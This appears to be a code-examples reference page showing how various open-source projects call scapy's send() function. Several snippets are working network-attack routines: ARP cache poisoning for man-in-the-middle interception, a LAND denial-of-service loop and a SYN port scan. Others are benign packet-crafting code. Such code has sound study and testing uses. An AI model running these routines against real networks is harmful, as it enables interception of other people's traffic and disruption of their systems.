Python scapy.all.send() Examples
The following are 28
code examples of scapy.all.send().
You can vote up the ones you like or vote down the ones you don't like,
and go to the original project or source file by following the links above each example.
You may also want to check out all available functions/classes of the module
scapy.all
, or try the search function
.
Example #1
Source File: mitm.py From creak with GNU General Public License v3.0 | 6 votes |
def restore(self, delay, target_b=None): if not target_b: target_b = self.gateway src_mac = ':'.join(a+b for a, b in zip(self.src_mac[::2], self.src_mac[1::2])) if not isinstance(self.target, list): dst_mac = utils.get_mac_by_ip(self.target) send(ARP(op=2, pdst=target_b, psrc=self.target, hwdst="ff:" * 5 + "ff", hwsrc=dst_mac), count=3, verbose=False) send(ARP(op=2, pdst=self.target, psrc=target_b, hwdst="ff:" * 5 + "ff", hwsrc=src_mac), count=3, verbose=False) else: for addr in self.target: dst_mac = utils.get_mac_by_ip(addr) send(ARP(op=2, pdst=target_b, psrc=addr, hwdst="ff:" * 5 + "ff", hwsrc=dst_mac), count=3, verbose=False) send(ARP(op=2, pdst=addr, psrc=target_b, hwdst="ff:" * 5 + "ff", hwsrc=src_mac), count=3, verbose=False)
Example #2
Source File: mitm.py From creak with GNU General Public License v3.0 | 6 votes |
def restore(self, delay, target_b=None): """ reset arp cache of the target and the router (AP) """ if not target_b: target_b = self.gateway source_mac = utils.get_mac_by_ip(target_b) sock = socket(PF_PACKET, SOCK_RAW) sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP)) if not isinstance(self.target, list): target_mac = utils.get_mac_by_ip(self.target) for _ in xrange(6): sock.send(str(utils.build_arp_packet(target_mac, target_b, self.target))) sock.send(str(utils.build_arp_packet(source_mac, self.target, target_b))) else: for addr in self.target: target_mac = utils.get_mac_by_ip(addr) for _ in xrange(6): sock.send(str(utils.build_arp_packet(target_mac, target_b, addr))) sock.send(str(utils.build_arp_packet(source_mac, addr, target_b)))
Example #3
Source File: mitm_utility.py From pentesting-multitool with GNU General Public License v3.0 | 5 votes |
def mac_getter(self, IP): # Sending ARP for take the MAC address ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=IP), timeout=2, iface=self.interface, inter=0.2) for send, receive in ans: return receive.sprintf(r"%Ether.src%")
Example #4
Source File: mitm.py From creak with GNU General Public License v3.0 | 5 votes |
def poison(self, delay, target_b=None): if not target_b: target_b = self.gateway src_mac = ':'.join(a+b for a, b in zip(self.src_mac[::2], self.src_mac[1::2])) if not isinstance(self.target, list): dst_mac = utils.get_mac_by_ip(self.target) send(ARP(op=2, pdst=self.target, psrc=target_b, hwdst=dst_mac), verbose=False) send(ARP(op=2, pdst=target_b, psrc=self.target, hwdst=src_mac), verbose=False) else: for addr in self.target: dst_mac = utils.get_mac_by_ip(addr) send(ARP(op=2, pdst=addr, psrc=target_b, hwdst=dst_mac), verbose=False) send(ARP(op=2, pdst=target_b, psrc=addr, hwdst=src_mac), verbose=False)
Example #5
Source File: mitm.py From creak with GNU General Public License v3.0 | 5 votes |
def poison(self, delay, target_b=None): """ poison arp cache of target and router, causing all traffic between them to pass inside our machine, MITM heart """ if not target_b: target_b = self.gateway utils.set_ip_forward(1) sock = socket(PF_PACKET, SOCK_RAW) sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP)) try: while True: if self.debug: log.info('[+] %s <-- %s -- %s -- %s --> %s', target_b, self.target, self.dev, target_b, self.target) if not isinstance(self.target, list): sock.send(str(utils.build_arp_packet( self.src_mac, target_b, self.target))) sock.send(str(utils.build_arp_packet( self.src_mac, self.target, target_b))) time.sleep(delay) # OS refresh ARP cache really often else: for addr in self.target: sock.send(str(utils.build_arp_packet(self.src_mac, target_b, addr))) sock.send(str(utils.build_arp_packet(self.src_mac, addr, target_b))) time.sleep(delay) # OS refresh ARP cache really often except KeyboardInterrupt: print('\n\r[+] Poisoning interrupted') sock.close()
Example #6
Source File: packets.py From aggr-inject with BSD 2-Clause "Simplified" License | 5 votes |
def send(self): return sendp(self.data, iface=MONITOR_INTERFACE, verbose=False)
Example #7
Source File: packets.py From aggr-inject with BSD 2-Clause "Simplified" License | 5 votes |
def send(self): return sendp(self.data, iface=MONITOR_INTERFACE, verbose=False)
Example #8
Source File: packets.py From aggr-inject with BSD 2-Clause "Simplified" License | 5 votes |
def send(self): return sendp(self.data, iface=MONITOR_INTERFACE, verbose=False) # 802.11 frame class with support for adding MSDUs to a single MPDU
Example #9
Source File: 18_5_modify_ip_in_a_packet.py From Python-Network-Programming with MIT License | 5 votes |
def send_packet(protocol=None, src_ip=None, src_port=None, flags=None, dst_ip=None, dst_port=None, iface=None): """Modify and send an IP packet.""" if protocol == 'tcp': packet = IP(src=src_ip, dst=dst_ip)/TCP(flags=flags, sport=src_port, dport=dst_port) elif protocol == 'udp': if flags: raise Exception(" Flags are not supported for udp") packet = IP(src=src_ip, dst=dst_ip)/UDP(sport=src_port, dport=dst_port) else: raise Exception("Unknown protocol %s" % protocol) send(packet, iface=iface)
Example #10
Source File: 8_5_modify_ip_in_a_packet.py From Python-Network-Programming-Cookbook-Second-Edition with MIT License | 5 votes |
def send_packet(protocol=None, src_ip=None, src_port=None, flags=None, dst_ip=None, dst_port=None, iface=None): """Modify and send an IP packet.""" if protocol == 'tcp': packet = IP(src=src_ip, dst=dst_ip)/TCP(flags=flags, sport=src_port, dport=dst_port) elif protocol == 'udp': if flags: raise Exception(" Flags are not supported for udp") packet = IP(src=src_ip, dst=dst_ip)/UDP(sport=src_port, dport=dst_port) else: raise Exception("Unknown protocol %s" % protocol) send(packet, iface=iface)
Example #11
Source File: mitm_utility.py From pentesting-multitool with GNU General Public License v3.0 | 5 votes |
def sending_arp(self): victim = self.mac_getter(self.victimIP) AP_MAC = self.mac_getter(self.gatewayIP) # Those replies places us between them (ARP Spoofing) send(ARP(op=2, pdst=self.victimIP, psrc=self.gatewayIP, hwdst=victim)) send(ARP(op=2, pdst=self.gatewayIP, psrc=self.victimIP, hwdst=AP_MAC))
Example #12
Source File: mitm_utility.py From pentesting-multitool with GNU General Public License v3.0 | 5 votes |
def ARPing(self): victimMAC = self.mac_getter(self.victimIP) AP_MAC = self.mac_getter(self.gatewayIP) # Creating and sending ARP packets for try to hide the attack send(ARP(op=2, pdst=self.victimIP, psrc=self.gatewayIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=AP_MAC), count=10) send(ARP(op=2, pdst=self.gatewayIP, psrc=self.victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=10) # Disabling IP Forwarding os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") exit()
Example #13
Source File: arpy.py From arpy with MIT License | 5 votes |
def poison(): v = scapy.ARP(pdst=target, psrc=gateway) while True: try: scapy.send(v,verbose=0,inter=1,loop=1) except KeyboardInterupt: print(bcolours.OKBLUE + ' [Warning] Stopping...' + bcolours.ENDC) sys.exit(3)
Example #14
Source File: arp_spoofer.py From vault with MIT License | 5 votes |
def startSpoof(self): """ Starts ARP spoofing """ t1 = time.time() colors.info('ARP Spoofing started...') colors.info('Press CTRL+C to exit...') try: while True: target_arp_packet, router_arp_packet = self.generatePacket() scapy.send(target_arp_packet, verbose=False) scapy.send(router_arp_packet, verbose=False) self.no_of_packets = self.no_of_packets + 1 print('[+] Packets sent : {}'.format(self.no_of_packets), end='\r') time.sleep(self.INTER) except KeyboardInterrupt: colors.info('Stopping ARP spoof') except Exception as e: print(e) finally: self.restore() t2 = time.time() colors.success('ARP Spoof completed in : {}'.format(t2-t1))
Example #15
Source File: arp_spoofer.py From vault with MIT License | 5 votes |
def restore(self): """ Restores the IP tables of the target and the router to the default state (before ARP spoof attack) """ colors.info('Restoring IP tables') target_arp_packet = scapy.ARP(op=2, pdst=self.target_ip, hwdst=self.target_mac, psrc=self.router_ip, hwsrc=self.router_mac) router_arp_packet = scapy.ARP(op=2, pdst=self.router_ip, hwdst=self.router_mac, psrc=self.target_ip, hwsrc=self.target_mac) COUNT = 10 # Send 10 packets to restore while COUNT > 0: scapy.send(target_arp_packet, verbose=False) scapy.send(router_arp_packet, verbose=False) COUNT = COUNT - 1 colors.success('ARP Table restored')
Example #16
Source File: misc_thread.py From upribox with GNU General Public License v3.0 | 5 votes |
def run(self): """Sends Multicast Listener Discovery Queries to all nodes on the network. Received Multicast Listener Reports are processed by a SniffThread. """ while True: send(IPv6(dst=self._MULTICAST_DEST, hlim=self._HOP_LIMIT) / IPv6ExtHdrHopByHop(options=RouterAlert()) / ICMPv6MLQuery(), iface=self.interface) time.sleep(self._SLEEP)
Example #17
Source File: misc_thread.py From upribox with GNU General Public License v3.0 | 5 votes |
def run(self): """Sends ICMPv6 echo request packets marked with the data upribox to the IPv6 all nodes multicast address. Received echo replies are processed by a SniffThread. """ while True: send(IPv6(dst=self._MULTICAST_DEST) / ICMPv6EchoRequest(data=self._DATA), iface=self.interface) time.sleep(self._SLEEP)
Example #18
Source File: arp_spoofing.py From hacking_tools with MIT License | 5 votes |
def restore(dest_ip, source_ip): dest_mac = get_mac(dest_ip) source_mac = get_mac(source_ip) packet = scapy.ARP(op=2, pdst=dest_ip, hwdst=dest_mac, psrc=source_ip, hwsrc=source_mac) scapy.send(packet, count=4, verbose=False)
Example #19
Source File: arp_spoofing.py From hacking_tools with MIT License | 5 votes |
def spoof(target_ip, spoof_ip): target_mac = get_mac(target_ip) packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip) scapy.send(packet, verbose=False) # Restore mac address in arp table
Example #20
Source File: arp_spoof.py From iot-inspector-client with MIT License | 5 votes |
def _arp_spoof(self, victim_mac, victim_ip, whitelist_ip_mac): """Sends out spoofed packets for a single target.""" with self._host_state.lock: spoof_arp = self._host_state.spoof_arp for dest_ip, dest_mac in whitelist_ip_mac: if victim_ip == dest_ip: continue dest_arp = sc.ARP() dest_arp.op = 2 dest_arp.psrc = victim_ip dest_arp.hwdst = dest_mac dest_arp.pdst = dest_ip if not spoof_arp: dest_arp.hwsrc = victim_mac utils.log('[Arp Spoof] Restoring', victim_ip, '->', dest_ip) victim_arp = sc.ARP() victim_arp.op = 2 victim_arp.psrc = dest_ip victim_arp.hwdst = victim_mac victim_arp.pdst = victim_ip if not spoof_arp: victim_arp.hwsrc = dest_mac utils.log('[Arp Spoof] Restoring', dest_ip, '->', victim_ip) sc.send(victim_arp, verbose=0) sc.send(dest_arp, verbose=0)
Example #21
Source File: syn_scan.py From iot-inspector-client with MIT License | 5 votes |
def _syn_scan_thread_helper(self): while True: time.sleep(1) if not self._host_state.is_inspecting(): continue # Build a random list of (ip, port). port_list = get_port_list() ip_list = self._host_state.ip_mac_dict.keys() ip_port_list = list(itertools.product(ip_list, port_list)) random.shuffle(ip_port_list) if len(ip_list) == 0: continue utils.log('[SYN Scanning] Start scanning {} ports over IPs: {}'.format( len(port_list), ', '.join(ip_list) )) for (ip, port) in ip_port_list: time.sleep(0.01) syn_pkt = sc.IP(dst=ip) / \ sc.TCP(dport=port, sport=SYN_SCAN_SOURCE_PORT, flags="S", seq=SYN_SCAN_SEQ_NUM) sc.send(syn_pkt, verbose=0) with self._lock: if not self._active: return
Example #22
Source File: core.py From mptcp-abuse with GNU General Public License v2.0 | 5 votes |
def generate(self, state, timeout=None): """Describe the packet to send for the class's packet type""" pass
Example #23
Source File: core.py From mptcp-abuse with GNU General Public License v2.0 | 5 votes |
def dbgshow(self, pkt): if self.conf["debug"] >= 5: if not pkt: self.debug("No packet to send.",level=5) return print("------- TO SEND -------") pkt.show2() print("---- END of PACKET ----")
Example #24
Source File: core.py From mptcp-abuse with GNU General Public License v2.0 | 5 votes |
def run(self, state, pkt, wait,timeout=None): """Send pkt, receive the answer if wait is True, and return a tuple (validity of reply packet, reply packet). If no test function is given, assume it's valid.""" self.dbgshow(pkt) if wait: # do we wait for a reply ? self.debug("Waiting for packet...", level=2) if pkt is None: timeout, buffermode = None, False if type(wait) is tuple: wait, timeout, buffermode = wait #print wait #wait, buffermode = wait if hasattr(wait, '__call__'): ans = self.waitForPacket(filterfct=wait, timeout=timeout) # if buffermode: # ans is a buffer (list) # self.debug("Entering buffer mode.", level=1) # return [self.packetReceived(pkt,buffermode=True) for pkt in ans] else: raise Exception("error, no packet generated.") else: #TODO: Make sure this waits continuously in a non blocking mode, convert this to dumping from a queue ans=sr1(pkt) else: send(pkt) #print pkt self.first = True # prev_pkt shouldnt be taken into account self.debug("Packet sent, no waiting, going on with next.",2) return (True, None) # no reply, no check return self.packetReceived(ans) # post-reply actions
Example #25
Source File: arpy.py From arpy with MIT License | 5 votes |
def gw_poison(): gw = scapy.ARP(pdst=gateway, psrc=target) while True: try: scapy.send(gw,verbose=0,inter=1,loop=1) except KeyboardInterrupt: print(bcolours.OKBLUE + ' [Warning] Stopping...' + bcolours.ENDC) sys.exit(3)
Example #26
Source File: cmd_land.py From habu with BSD 3-Clause "New" or "Revised" License | 4 votes |
def cmd_land(ip, count, port, iface, verbose): """This command implements the LAND attack, that sends packets forging the source IP address to be the same that the destination IP. Also uses the same source and destination port. The attack is very old, and can be used to make a Denial of Service on old systems, like Windows NT 4.0. More information here: https://en.wikipedia.org/wiki/LAND \b # sudo habu.land 172.16.0.10 ............ Note: Each dot (.) is a sent packet. You can specify how many packets send with the '-c' option. The default is never stop. Also, you can specify the destination port, with the '-p' option. """ conf.verb = False if iface: iface = search_iface(iface) if iface: conf.iface = iface['name'] else: logging.error('Interface {} not found. Use habu.interfaces to show valid network interfaces'.format(iface)) return False layer3 = IP() layer3.dst = ip layer3.src = ip layer4 = TCP() layer4.dport = port layer4.sport = port pkt = layer3 / layer4 counter = 0 while True: send(pkt) counter += 1 if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() if count != 0 and counter == count: break return True
Example #27
Source File: cmd_tcp_isn.py From habu with BSD 3-Clause "New" or "Revised" License | 4 votes |
def cmd_tcp_isn(ip, port, count, iface, graph, verbose): """Create TCP connections and print the TCP initial sequence numbers for each one. \b $ sudo habu.tcp.isn -c 5 www.portantier.com 1962287220 1800895007 589617930 3393793979 469428558 Note: You can get a graphical representation (needs the matplotlib package) using the '-g' option to better understand the randomness. """ conf.verb = False if iface: iface = search_iface(iface) if iface: conf.iface = iface['name'] else: logging.error('Interface {} not found. Use habu.interfaces to show valid network interfaces'.format(iface)) return False isn_values = [] for _ in range(count): pkt = IP(dst=ip)/TCP(sport=RandShort(), dport=port, flags="S") ans = sr1(pkt, timeout=0.5) if ans: send(IP(dst=ip)/TCP(sport=pkt[TCP].sport, dport=port, ack=ans[TCP].seq + 1, flags='A')) isn_values.append(ans[TCP].seq) if verbose: ans.show2() if graph: try: import matplotlib.pyplot as plt except ImportError: print("To graph support, install matplotlib") return 1 plt.plot(range(len(isn_values)), isn_values, 'ro') plt.show() else: for v in isn_values: print(v) return True
Example #28
Source File: core.py From mptcp-abuse with GNU General Public License v2.0 | 4 votes |
def sendpkt(self, newpkt, initstate=None, timeout=None, waitAck=None, **kargs): """Generate and send a new packet Generate a new packet using the function newpkt, from existing current state overriden by initstate, then send it. Return a tuple (sent packet, reply, new state) Arguments: newpkt -- function to generate the scapy packet to send. It must have at least have a state dictionnary as first parameter initstate -- state overriding the current state. testfct -- optional function used to check the validity of a reply kargs -- other optional arguments to be passed to the newpkt function """ if self.state is None: if initstate is None: # If no initial state is given at the first call, use a generic one self.state = ProtoState() else: self.state = initstate else: self.state.update(initstate) s = self.state # simple alias if self.first: self.first = False # elif not s.getLastPacket(): # raise Exception("no previous packet, can't resume the protocol") try: (pkt, wait) = newpkt().generate(s, timeout=timeout, **kargs) if s.hasKey("stage") and pkt is not None: self.debug("Generating %s packet..." % s["stage"], 2) r = self.run(s, pkt, wait) if type(r) is list: # buffermode return r # otherwise, it's a classic (validity, reply) tuple (ret, reply) = r except PktWaitTimeOutException as e: raise e #PktWaitTimeOutException(e. except Exception as e: import sys if self.conf["debug"]: import traceback traceback.print_exc(file=sys.stdout) print("Error: %s" % e) print("Exiting.") sys.exit(0) return (pkt, ret, reply, self.state)